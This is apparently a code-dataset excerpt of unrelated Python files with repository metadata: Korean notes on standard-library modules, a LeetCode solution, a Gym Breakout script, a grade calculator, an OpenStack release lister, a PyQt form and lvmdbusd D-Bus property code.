shutil — High-level file operations # https://docs.python.org/3/library/shutil.html ###################################### # shutil.copy(src, dst) 파일 복사하기 # ###################################### import shutil shutil.copy('src.txt','dst.txt') # Q: Why not os.copy? or os.cpy(src,dst) #%% glob # glob 특정 디렉토리에 있는 파일이름을 모두 알아야 할 때... # 파일명의 전체 리스트를 만들거나, # *,? 등의 메타 문자를 써서 원하는 파일만 읽을 수도 있다. # glob( pathname ) 디렉터리에 있는 파일들의 리스트 만들기 import glob glob.glob('C:/Python/q*') # [] # 다른 예 # (왜냐하면 위의 예는 Win10의 Anaconda Prompt에서 동작하지 않았다.) os.getcwd() # 'C:\\Users\\aimldl' os.system('dir') # dir의 결과는 위쪽 os.system('dir')의 실행결과를 참고할 것. glob.glob('D*') # ['Desktop', 'Documents', 'Downloads', 'Dropbox'] #%% tempfile # tempfile은 파일을 임시로 만들어서 사용할 때 유용하다. ##################### # tempfile.mktemp() # ##################### # 중복되지 않는 임시 파일의 이름을 무작위로 만들어서 리턴한다. import tempfile filename = tempfile.mktemp() filename #'C:\\Users\\aimldl\\AppData\\Local\\Temp\\tmpt7qbpmb7' ############################ # tempfile.TemporaryFile() # ############################ # 임시 저장 공간으로 사용될 파일 객체를 리턴 # 이 파일은 기본적으로 바이너리 쓰기 모드 (wb)를 갖는다. # f.close()가 호출되면 이 파일 객체는 자동으로 사라진다. import tempfile f = tempfile.TemporaryFile() f.close() # Q: 솔직히 용도를 잘 모르겠음. #%% time # time모듈은 시간과 관련된 유용한 함수가 많다. ############## # time.sleep # ############## # 책에는 마직막인데 제일 앞으로 당김. # 주로 루프 안에서 일정 시간 간격을 두고 루프를 실행할 때 쓰인다. # sleep1.py import time for i in range(10): print( i ) time.sleep(1) # 1 sec ############# # time.time # ############# # UTC (Universal Time Coordinate, 세계표준시)로 현재 시간을 실수 형태로 리턴한다. # 기준: 1970년 1월 1일 0시 0분 0초 # 기준시간이후로 지난 시간을 초단위로 리턴함. import time time.time() #1563005221.5239825 ################## # time.localtime # ################## # 연도,월,일,시,분,초의 형태로 바꿔서 리턴한다. # time.time()에 의해 반환되는 실수값을 이용 import time # Option 1 time.localtime() # time.struct_time(tm_year=2019, tm_mon=7, tm_mday=13, tm_hour=17, tm_min=9, tm_sec=7, tm_wday=5, tm_yday=194, tm_isdst=0) # Option 2 time.localtime( time.time() ) ################ # time.asctime # ################ # time.localtime에서 반환된 튜플형태의 입력을... # 날짜와 시간을 알아보기 쉬운 형태로 리턴한다. import time # Option 1 time.asctime() # 'Sat Jul 13 17:11:22 2019' # Option 2 local_time = time.localtime() time.asctime( local_time ) # 'Sat Jul 13 17:11:22 2019' # Option 3 time_time = time.time() local_time = time.localtime( time_time ) time.asctime( local_time ) # 'Sat Jul 13 17:11:22 2019' ############## # time.ctime # ############## # Current Time # time.asctime()와 같은 포맷으로 시간을 리턴한다. # 단, 현재 시간만 리턴한다는 것이 다르다. import time time.ctime() # 'Sat Jul 13 17:13:27 2019' ################# # time.strftime # ################# # time.strftime( format_code, time.locatime() ) # format_code를 지정할 수 있다. # 예 import time time.strftime( '%x', time.localtime() ) #'07/13/19' time.strftime( '%c', time.localtime() ) #'Sat Jul 13 17:16:54 2019' #%% format code for time.strftime # TODO: 관련 링크를 넣을 것. # 책의 p.259에도 있음. #%% calendar # calendar는 파이썬에서 달력을 볼 수 있게 한다. ############################# # calendar.calendar( year ) # ############################# # 입력한 연도의 전체 달력을 볼 수 있다. import calendar print( calendar.calendar(2019) ) # 2019 # # January February March #Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 1 2 3 1 2 3 # 7 8 9 10 11 12 13 4 5 6 7 8 9 10 4 5 6 7 8 9 10 #14 15 16 17 18 19 20 11 12 13 14 15 16 17 11 12 13 14 15 16 17 #21 22 23 24 25 26 27 18 19 20 21 22 23 24 18 19 20 21 22 23 24 #28 29 30 31 25 26 27 28 25 26 27 28 29 30 31 # # April May June #Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 7 1 2 3 4 5 1 2 # 8 9 10 11 12 13 14 6 7 8 9 10 11 12 3 4 5 6 7 8 9 #15 16 17 18 19 20 21 13 14 15 16 17 18 19 10 11 12 13 14 15 16 #22 23 24 25 26 27 28 20 21 22 23 24 25 26 17 18 19 20 21 22 23 #29 30 27 28 29 30 31 24 25 26 27 28 29 30 # # July August September #Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 7 1 2 3 4 1 # 8 9 10 11 12 13 14 5 6 7 8 9 10 11 2 3 4 5 6 7 8 #15 16 17 18 19 20 21 12 13 14 15 16 17 18 9 10 11 12 13 14 15 #22 23 24 25 26 27 28 19 20 21 22 23 24 25 16 17 18 19 20 21 22 #29 30 31 26 27 28 29 30 31 23 24 25 26 27 28 29 # 30 # # October November December #Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 1 2 3 1 # 7 8 9 10 11 12 13 4 5 6 7 8 9 10 2 3 4 5 6 7 8 #14 15 16 17 18 19 20 11 12 13 14 15 16 17 9 10 11 12 13 14 15 #21 22 23 24 25 26 27 18 19 20 21 22 23 24 16 17 18 19 20 21 22 #28 29 30 31 25 26 27 28 29 30 23 24 25 26 27 28 29 # 30 31 ########################## # calendar.prcal( year ) # ########################## # calendar.calendar( year )와 동일한 결과 # Q: 그러면 왜 만들어 놓았나? import calendar calendar.prcal( 2019 ) ################################### # calendar.prmonth( year, month ) # ################################### calendar.prmonth( 2019,7 ) # July 2019 #Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 7 # 8 9 10 11 12 13 14 #15 16 17 18 19 20 21 #22 23 24 25 26 27 28 #29 30 31 ######################################## # calendar.weekday( year, month, day ) # ######################################## # 요일정보, # 0 월요일 # 1 화요일 # [...] # 5 토요일 # 6 일요일 calendar.weekday( 2019,7,13 ) # 5 # 토요일 # 07을 입력하면 에러 calendar.weekday( 2019,07,13 ) # SyntaxError: invalid token ####################### # calendar.monthrange # ####################### # monthrange는 입력한 년월에 대해 # (1일의 요일, 몇일까지 있는지 ) # 를 튜플로 리턴한다. calendar.monthrange( 2015, 12 ) # (1, 31) # 2015년 12월의 # 1의 의미: 화요일, 1일은 1, 즉 화요일이다. # 31의 의미: 12월은 31일까지이다. # prmonth로 결과를 확인해보면... calendar.prmonth(2015, 12) # December 2015 #Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 # 7 8 9 10 11 12 13 #14 15 16 17 18 19 20 #21 22 23 24 25 26 27 #28 29 30 31 #다른 예 calendar.monthrange( 2019, 7 ) # (0, 31) # 2019년 7월 1일은 월요일이고, # 이 달은 31일까지 있다. # 2019년 7월도 확인해보면... calendar.prmonth(2019, 7) # July 2019 #Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 7 # 8 9 10 11 12 13 14 #15 16 17 18 19 20 21 #22 23 24 25 26 27 28 #29 30 31 #%% random & randint # random으로 난수 (규칙이 없는 임의의 수)를 발생시킨다. # 주의: 난수이므로 출력값은 매번 바뀐다. import random random.random() # 0.0~1.0 사이의 실수 # 0.3234451917255078 random.randint(1,10) # 1~10 사이의 정수 # 4 random.randint(1,55) # 1~55 사이의 정수 # 43 # random모듈을 이용해서 재미있는 함수를 만들어본다. # 리스트의 요소 중에서 무작위로 하나를 선택하여 꺼낸 다음 그 값을 리턴한다. # pop을 하므로 요소는 하나씩 사라진다. # 이 스크립트는 별도의 파일로 저장해서 실행해야 한다. # $ python random_pop.py # 출력값의 한 예는 다음과 같다. #5 #4 #2 #1 #3 ################# # random_pop.py # ################# import random def random_pop( data ): number = random.randint( 0, len(data)-1 ) return data.pop( number ) if __name__ == "__main__": data = [1,2,3,4,5] while data: print( random_pop(data) ) # 위의 함수는 random.choice함수를 사용해서 아래처럼 조금 더 직관적으로 만들 수 있다. ################## # random_pop2.py # ################## def random_pop2( data ): number = random.choice( data ) data.remove( number ) return number if __name__ == "__main__": data = [1,2,3,4,5] while data: print( random_pop2(data) ) ################## # random.shuffle # ################## # 리스트의 항목을 무작위로 섞을 때 쓸 수 있다. import random data = [1,2,3,4,5] random.shuffle( data ) data # [3, 2, 4, 1, 5] #%% webbrowser # webbrowser로 자신의 시스템에서 사용하는 기본 웹 브라우저를 자동실행 할 수 있다. import webbrowser webbrowser.open('http://www.google.com') # open_new함수는 이미 웹브라우저가 실행된 상태이더라도 # 새로운 창으로 해당 주소가 열리도록 한다. webbrowser.open_new('http://www.google.com')
31.869775
400
0.508904
54c00deca98864734a9ea2fb1379fa401e4950fd
616
py
Python
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2015-12-16T04:01:03.000Z
2015-12-16T04:01:03.000Z
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
1
2016-02-09T06:00:07.000Z
2016-02-09T07:20:13.000Z
leetcode/543-Diameter-of-Binary-Tree/dfs_recursive_me.py
cc13ny/all-in
bc0b01e44e121ea68724da16f25f7e24386c53de
[ "MIT" ]
2
2019-06-27T09:07:26.000Z
2019-07-01T04:40:13.000Z
# Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution: def diameterOfBinaryTree(self, root: TreeNode) -> int: _, res = self.max_depth(root) return res def max_depth(self, node: TreeNode) -> int: if node is None: return -1, 0 left_depth, left_max = self.max_depth(node.left) right_depth, right_max = self.max_depth(node.right) return max(left_depth, right_depth) + 1, max(left_depth + right_depth + 2, left_max, right_max)
30.8
103
0.616883
b7b5a0f33ba89b330993f718c5f06e0741a89e7f
1,527
py
Python
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-05-10T09:16:23.000Z
2019-05-10T09:16:23.000Z
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
null
null
null
tensorflow/basic-rl/tutorial8/gym/breakout/breakout_random.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-05-10T09:17:28.000Z
2019-05-10T09:17:28.000Z
''' Random Breakout AI player @author: Victor Mayoral Vilches <[email protected]> ''' import gym import numpy import random import pandas if __name__ == '__main__': env = gym.make('Breakout-v0') env.monitor.start('/tmp/breakout-experiment-1', force=True) # video_callable=lambda count: count % 10 == 0) goal_average_steps = 195 max_number_of_steps = 200 last_time_steps = numpy.ndarray(0) n_bins = 8 n_bins_angle = 10 number_of_features = env.observation_space.shape[0] last_time_steps = numpy.ndarray(0) action_attack = [False]*43 action_attack[0] = True action_right = [False]*43 action_right[10] = True action_left = [False]*43 action_left[11] = True actions = [action_attack, action_left, action_right] done = False observation = env.reset() for i_episode in xrange(30): if done: observation = env.reset() for t in xrange(max_number_of_steps): env.render() # Execute the action and get feedback observation, reward, done, info = env.step(env.action_space.sample()) if done: break l = last_time_steps.tolist() l.sort() print("Overall score: {:0.2f}".format(last_time_steps.mean())) print("Best 100 score: {:0.2f}".format(reduce(lambda x, y: x + y, l[-100:]) / len(l[-100:]))) env.monitor.close() # gym.upload('/tmp/cartpole-experiment-1', algorithm_id='vmayoral simple Q-learning', api_key='your-key')
27.267857
109
0.639162
4deeed8aa1253076ca937b9a354bcdeba019bc51
462
py
Python
task_5/create_example.py
christopher-besch/bwinf39
e5394b37894a56608312057d179029d8a5df98fd
[ "MIT" ]
1
2021-01-04T15:16:44.000Z
2021-01-04T15:16:44.000Z
task_5/create_example.py
christopher-besch/bwinf39
e5394b37894a56608312057d179029d8a5df98fd
[ "MIT" ]
null
null
null
task_5/create_example.py
christopher-besch/bwinf39
e5394b37894a56608312057d179029d8a5df98fd
[ "MIT" ]
null
null
null
from random import choice def main(): amount_students = 1000 amount_wishes = 100 print(amount_students) for student_number in range(1, amount_students + 1): wishes = [] for _ in range(amount_wishes): while str(wish := choice(range(1, amount_students + 1))) in wishes: pass wishes.append(str(wish)) print(" ".join(wishes)) if __name__ == "__main__": main()
24.315789
80
0.569264
150538a9741d119e14f2e15d72281b72c44210bf
74
py
Python
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
16
2018-11-26T08:39:42.000Z
2019-05-08T10:09:52.000Z
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
8
2020-05-04T06:29:26.000Z
2022-02-12T05:33:16.000Z
python/coursera_python/WESLEYAN/week3/COURSERA/week_3/t_6.py
SayanGhoshBDA/code-backup
8b6135facc0e598e9686b2e8eb2d69dd68198b80
[ "MIT" ]
5
2020-02-11T16:02:21.000Z
2021-02-05T07:48:30.000Z
infilename = input() outfilename = input() print(infilename,outfilename)
14.8
29
0.77027
4215537d3e39a92788e9a43f55a4d74635db25bf
2,281
py
Python
bewerte/note.py
jupfi81/NotenManager
ee96a41088bb898c025aed7b3c904741cb71d004
[ "MIT" ]
null
null
null
bewerte/note.py
jupfi81/NotenManager
ee96a41088bb898c025aed7b3c904741cb71d004
[ "MIT" ]
null
null
null
bewerte/note.py
jupfi81/NotenManager
ee96a41088bb898c025aed7b3c904741cb71d004
[ "MIT" ]
null
null
null
""" Modul, dass die Gesamtnote fuer einen Schueler bestimmt """ import configparser from statistics import mean def endnote(schueler, klasserc): """ Berechnet die Gesamtnote (klappt nur, wenn es nur schriftlich un mündlich gibt""" # Schritt 1: loesche in allen Listen die leeren Noten for art in schueler: noten = [] for val in schueler[art]: if val: noten.append(val) schueler[art] = noten config = configparser.ConfigParser() config.read('~/Projekte/KlassenManager/config/defaultrc') config.read(klasserc) noten = dict() wichtungs_summe = dict() for kategorie in config['basics']['Kategorien'].split(','): noten.update({kategorie.strip() : []}) wichtungs_summe.update({kategorie.strip() : 0}) for art in schueler: if schueler[art]: if config['bewertungsart'][art] == "e": noten[config['arten'][art]] += [float(config['wichtung'][art]) * val for val in schueler[art]] wichtungs_summe[config['arten'][art]] += (float(config['wichtung'][art]) * len(schueler[art])) elif config['bewertungsart'][art] == 'g': noten[config['arten'][art]].append(float(config['wichtung'][art]) * mean(schueler[art])) wichtungs_summe[config['arten'][art]] += float(config['wichtung'][art]) if wichtungs_summe['muendlich']: muendlich = sum(noten['muendlich']) / wichtungs_summe['muendlich'] else: print("note:", schueler) muendlich = 100 print("Etwas mit der Wichtung dern muendlichen Noten stimmt nicht") if sum(noten['schriftlich']) == 0: schriftlich = 0 wichtungs_summe['schriftlich'] = 0 note = muendlich else: schriftlich = sum(noten['schriftlich']) / wichtungs_summe['schriftlich'] note = ((float(config['wichtung']['schriftlich']) * schriftlich + float(config['wichtung']['muendlich']) * muendlich) / (float(config['wichtung']['schriftlich']) + float(config['wichtung']['muendlich']))) return round(note, 2)
43.865385
100
0.569049
42b1be2d3c4471a7cca6c9fb32ef9512a827e432
366
py
Python
pacman-termux/test/pacman/tests/overwrite-files-match-negated.py
Maxython/pacman-for-termux
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
[ "MIT" ]
23
2021-05-21T19:11:06.000Z
2022-03-31T18:14:20.000Z
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
11
2021-05-21T12:08:44.000Z
2021-12-21T08:30:08.000Z
source/pacman-6.0.1/test/pacman/tests/overwrite-files-match-negated.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
[ "Unlicense" ]
1
2021-09-26T08:44:40.000Z
2021-09-26T08:44:40.000Z
self.description = "Install a package with an existing file matching a negated --overwrite pattern" p = pmpkg("dummy") p.files = ["foobar"] self.addpkg(p) self.filesystem = ["foobar*"] self.args = "-U --overwrite=foobar --overwrite=!foo* %s" % p.filename() self.addrule("!PACMAN_RETCODE=0") self.addrule("!PKG_EXIST=dummy") self.addrule("!FILE_MODIFIED=foobar")
26.142857
99
0.713115
676013cbf4f52ac7c30faf41992f7941e996adac
1,559
py
Python
intro-vietstack/tools/release-programs.py
vietstack/vietstack.github.io
6571001dc72751ee89115d9ed520c2b9ca2f2b86
[ "MIT" ]
1
2016-11-29T09:35:50.000Z
2016-11-29T09:35:50.000Z
intro-vietstack/tools/release-programs.py
vietstack/vietstack.github.io
6571001dc72751ee89115d9ed520c2b9ca2f2b86
[ "MIT" ]
8
2016-09-23T01:25:12.000Z
2016-11-14T04:02:16.000Z
intro-vietstack/tools/release-programs.py
vietstack/vietstack.github.io
6571001dc72751ee89115d9ed520c2b9ca2f2b86
[ "MIT" ]
14
2016-09-22T01:46:57.000Z
2019-09-05T05:42:11.000Z
#!/usr/bin/python import os import sys import argparse import yaml releases = [ 'austin', 'bexar', 'cactus', 'diablo', 'essex', 'folsom', 'grizzly', 'havana', 'icehouse', 'juno', 'kilo' ] release_dict = dict((y,x) for x,y in (enumerate(releases))) def parse_args(): p = argparse.ArgumentParser() p.add_argument('--markdown', '-m', action='store_true') p.add_argument('program_yaml') p.add_argument('release') return p.parse_args() def main(): args = parse_args() with open(args.program_yaml) as fd: programs = yaml.load(fd) target = release_dict[args.release] selected = [] for program,info in programs.items(): info['program'] = program for project in info['projects']: if 'integrated-since' in project: break else: continue integrated = release_dict[project['integrated-since']] if integrated <= target: selected.append(info) if args.markdown: for program in sorted(selected, key=lambda x: x['codename']): print '- [%s][] (%s)' % ( program['codename'], program['program']) print for program in sorted(selected, key=lambda x: x['codename']): print '[%s]: %s' % ( program['codename'], program['url']) else: for program in sorted(selected, key=lambda x: x['codename']): print program['codename'] if __name__ == '__main__': main()
23.984615
69
0.556767
c02847c1d491cc1ce610e1dc490f15e02e0b2bde
2,984
py
Python
src/Sephrasto/UI/CharakterFreieFert.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-02-02T16:15:59.000Z
2022-02-02T16:15:59.000Z
src/Sephrasto/UI/CharakterFreieFert.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-01-14T11:04:19.000Z
2022-01-14T11:04:19.000Z
src/Sephrasto/UI/CharakterFreieFert.py
lukruh/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'CharakterFreieFert.ui' # # Created by: PyQt5 UI code generator 5.15.6 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.resize(872, 460) self.gridLayout_3 = QtWidgets.QGridLayout(Form) self.gridLayout_3.setContentsMargins(20, 20, 20, 20) self.gridLayout_3.setObjectName("gridLayout_3") self.gridLayout = QtWidgets.QGridLayout() self.gridLayout.setVerticalSpacing(20) self.gridLayout.setObjectName("gridLayout") spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.gridLayout.addItem(spacerItem, 0, 0, 1, 1) self.label = QtWidgets.QLabel(Form) self.label.setMinimumSize(QtCore.QSize(0, 18)) self.label.setAlignment(QtCore.Qt.AlignCenter) self.label.setObjectName("label") self.gridLayout.addWidget(self.label, 4, 0, 1, 1) spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding) self.gridLayout.addItem(spacerItem1, 5, 0, 1, 1) self.groupBox = QtWidgets.QGroupBox(Form) self.groupBox.setTitle("") self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter) self.groupBox.setFlat(False) self.groupBox.setObjectName("groupBox") self.freieFertsGrid = QtWidgets.QGridLayout(self.groupBox) self.freieFertsGrid.setContentsMargins(20, 20, 20, 20) self.freieFertsGrid.setObjectName("freieFertsGrid") self.gridLayout.addWidget(self.groupBox, 2, 0, 1, 1) self.labelRegeln = QtWidgets.QLabel(Form) self.labelRegeln.setAlignment(QtCore.Qt.AlignCenter) self.labelRegeln.setObjectName("labelRegeln") self.gridLayout.addWidget(self.labelRegeln, 3, 0, 1, 1) self.gridLayout_3.addLayout(self.gridLayout, 0, 0, 1, 1) self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) def retranslateUi(self, Form): _translate = QtCore.QCoreApplication.translate Form.setWindowTitle(_translate("Form", "Form")) self.label.setText(_translate("Form", "Der erste Eintrag ist die Muttersprache des Charakters.\n" "Jeder Charakter beherrscht seine Muttersprache meisterlich, ohne dafür zu bezahlen.")) self.labelRegeln.setText(_translate("Form", "Freie Fertigkeiten sind in drei Stufen geteilt: Unerfahren (I), erfahren (II) und meisterlich (III).")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Form = QtWidgets.QWidget() ui = Ui_Form() ui.setupUi(Form) Form.show() sys.exit(app.exec_())
44.537313
156
0.702748
c036d64299ea73f594f3e7274d7746722758b468
329
py
Python
backend/fakebox/models/player.py
teodorvoicencu/FakeBox
f14ca83643894d9d0761294cfce511a52401de68
[ "MIT" ]
null
null
null
backend/fakebox/models/player.py
teodorvoicencu/FakeBox
f14ca83643894d9d0761294cfce511a52401de68
[ "MIT" ]
null
null
null
backend/fakebox/models/player.py
teodorvoicencu/FakeBox
f14ca83643894d9d0761294cfce511a52401de68
[ "MIT" ]
null
null
null
class Player: def __init__(self, player_id: int, nickname: str, websocket, is_vip: bool = False): self.player_id = player_id self.nickname = nickname self.is_vip = is_vip self.websocket = websocket def __repr__(self): return 'Player({}, {})'.format(self.player_id, self.nickname)
32.9
87
0.641337
97eb068e3b56a2721bae8b3d960ae96d868aea8a
924
py
Python
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
8
2020-03-24T17:47:23.000Z
2022-03-12T00:33:21.000Z
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
def longest_linked_list_chain(keys, buckets, loops=10): """ Rolls `keys` number of random keys into `buckets` buckets and counts the collisions. Run `loops` number of times. """ for i in range(loops): key_counts = {} for i in range(buckets): key_counts[i] = 0 for i in range(keys): random_key = str(random.random()) hash_index = hash(random_key) % buckets key_counts[hash_index] += 1 largest_n = 0 for key in key_counts: if key_counts[key] > largest_n: largest_n = key_counts[key] print( f"Longest Linked List Chain for {keys} keys in {buckets} buckets (Load Factor: {keys/buckets:.2f}): {largest_n}" ) longest_linked_list_chain(4, 16, 5) longest_linked_list_chain(16, 16, 5) longest_linked_list_chain(32, 16, 5) longest_linked_list_chain(1024, 128, 5)
31.862069
124
0.611472
e188fa4d523ec6ccd55ce55e698060c3b7fa8330
6,409
py
Python
hihope_neptune-oh_hid/00_src/v0.1/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
dawmlight/vendor_oh_fun
bc9fb50920f06cd4c27399f60076f5793043c77d
[ "Apache-2.0" ]
1
2022-02-15T08:51:55.000Z
2022-02-15T08:51:55.000Z
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
dawmlight/vendor_oh_fun
bc9fb50920f06cd4c27399f60076f5793043c77d
[ "Apache-2.0" ]
null
null
null
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
dawmlight/vendor_oh_fun
bc9fb50920f06cd4c27399f60076f5793043c77d
[ "Apache-2.0" ]
null
null
null
# Copyright (C) 2015-2016 Red Hat, Inc. All rights reserved. # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions # of the GNU General Public License v.2. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import dbus import dbus.service from . import cfg from .utils import get_properties, add_properties, get_object_property_diff, \ log_debug from .state import State # noinspection PyPep8Naming,PyUnresolvedReferences class AutomatedProperties(dbus.service.Object): """ This class implements the needed interfaces for: org.freedesktop.DBus.Properties Other classes inherit from it to get the same behavior """ def __init__(self, object_path, search_method=None): dbus.service.Object.__init__(self, cfg.bus, object_path) self._ap_interface = [] self._ap_o_path = object_path self._ap_search_method = search_method self.state = None def dbus_object_path(self): return self._ap_o_path def emit_data(self): props = {} for i in self.interface(): props[i] = AutomatedProperties._get_all_prop(self, i) return self._ap_o_path, props def set_interface(self, interface): """ With inheritance we can't easily tell what interfaces a class provides so we will have each class that implements an interface tell the base AutomatedProperties what it is they do provide. This is kind of clunky and perhaps we can figure out a better way to do this later. :param interface: An interface the object supports :return: """ if interface not in self._ap_interface: self._ap_interface.append(interface) # noinspection PyUnusedLocal def interface(self, all_interfaces=False): if all_interfaces: cpy = list(self._ap_interface) cpy.extend( ["org.freedesktop.DBus.Introspectable", "org.freedesktop.DBus.Properties"]) return cpy return self._ap_interface @staticmethod def _get_prop(obj, interface_name, property_name): value = getattr(obj, property_name) # Note: If we get an exception in this handler we won't know about it, # only the side effect of no returned value! log_debug('Get (%s), type (%s), value(%s)' % (property_name, str(type(value)), str(value))) return value # Properties # noinspection PyUnusedLocal @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE, in_signature='ss', out_signature='v', async_callbacks=('cb', 'cbe')) def Get(self, interface_name, property_name, cb, cbe): # Note: If we get an exception in this handler we won't know about it, # only the side effect of no returned value! r = cfg.create_request_entry( -1, AutomatedProperties._get_prop, (self, interface_name, property_name), cb, cbe, False) cfg.worker_q.put(r) @staticmethod def _get_all_prop(obj, interface_name): if interface_name in obj.interface(True): # Using introspection, lets build this dynamically properties = get_properties(obj) if interface_name in properties: return properties[interface_name][1] return {} raise dbus.exceptions.DBusException( obj._ap_interface, 'The object %s does not implement the %s interface' % (obj.__class__, interface_name)) @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE, in_signature='s', out_signature='a{sv}', async_callbacks=('cb', 'cbe')) def GetAll(self, interface_name, cb, cbe): r = cfg.create_request_entry( -1, AutomatedProperties._get_all_prop, (self, interface_name), cb, cbe, False) cfg.worker_q.put(r) @dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE, in_signature='ssv') def Set(self, interface_name, property_name, new_value): setattr(self, property_name, new_value) self.PropertiesChanged(interface_name, {property_name: new_value}, []) # As dbus-python does not support introspection for properties we will # get the autogenerated xml and then add our wanted properties to it. @dbus.service.method(dbus_interface=dbus.INTROSPECTABLE_IFACE, out_signature='s') def Introspect(self): r = dbus.service.Object.Introspect(self, self._ap_o_path, cfg.bus) # Look at the properties in the class props = get_properties(self) for int_f, v in props.items(): r = add_properties(r, int_f, v[0]) return r @dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE, signature='sa{sv}as') def PropertiesChanged(self, interface_name, changed_properties, invalidated_properties): log_debug(('SIGNAL: PropertiesChanged(%s, %s, %s, %s)' % (str(self._ap_o_path), str(interface_name), str(changed_properties), str(invalidated_properties)))) def refresh(self, search_key=None, object_state=None): """ Take the values (properties) of an object and update them with what lvm currently has. You can either fetch the new ones or supply the new state to be updated with :param search_key: The value to use to search for :param object_state: Use this as the new object state """ num_changed = 0 # If we can't do a lookup, bail now, this happens if we blindly walk # through all dbus objects as some don't have a search method, like # 'Manager' object. if not self._ap_search_method: return search = self.lvm_id if search_key: search = search_key # Either we have the new object state or we need to go fetch it if object_state: new_state = object_state else: new_state = self._ap_search_method([search])[0] assert isinstance(new_state, State) assert new_state # When we refresh an object the object identifiers might have changed # because LVM allows the user to change them (name & uuid), thus if # they have changed we need to update the object manager so that # look-ups will happen correctly old_id = self.state.identifiers() new_id = new_state.identifiers() if old_id[0] != new_id[0] or old_id[1] != new_id[1]: cfg.om.lookup_update(self, new_id[0], new_id[1]) # Grab the properties values, then replace the state of the object # and retrieve the new values. o_prop = get_properties(self) self.state = new_state n_prop = get_properties(self) changed = get_object_property_diff(o_prop, n_prop) if changed: for int_f, v in changed.items(): self.PropertiesChanged(int_f, v, []) num_changed += 1 return num_changed
32.866667
78
0.73428
55cdd1e45a11845aec8414b82e74156ad78c9607
2,654
py
Python
scripts/qt2/pyqt_sw23a_MouseEvent.py
ProfJust/Ruhr-TurtleBot-Competition-RTC-
5c2425bee331b4d5033757a9425676932d111775
[ "Unlicense", "MIT" ]
null
null
null
scripts/qt2/pyqt_sw23a_MouseEvent.py
ProfJust/Ruhr-TurtleBot-Competition-RTC-
5c2425bee331b4d5033757a9425676932d111775
[ "Unlicense", "MIT" ]
null
null
null
scripts/qt2/pyqt_sw23a_MouseEvent.py
ProfJust/Ruhr-TurtleBot-Competition-RTC-
5c2425bee331b4d5033757a9425676932d111775
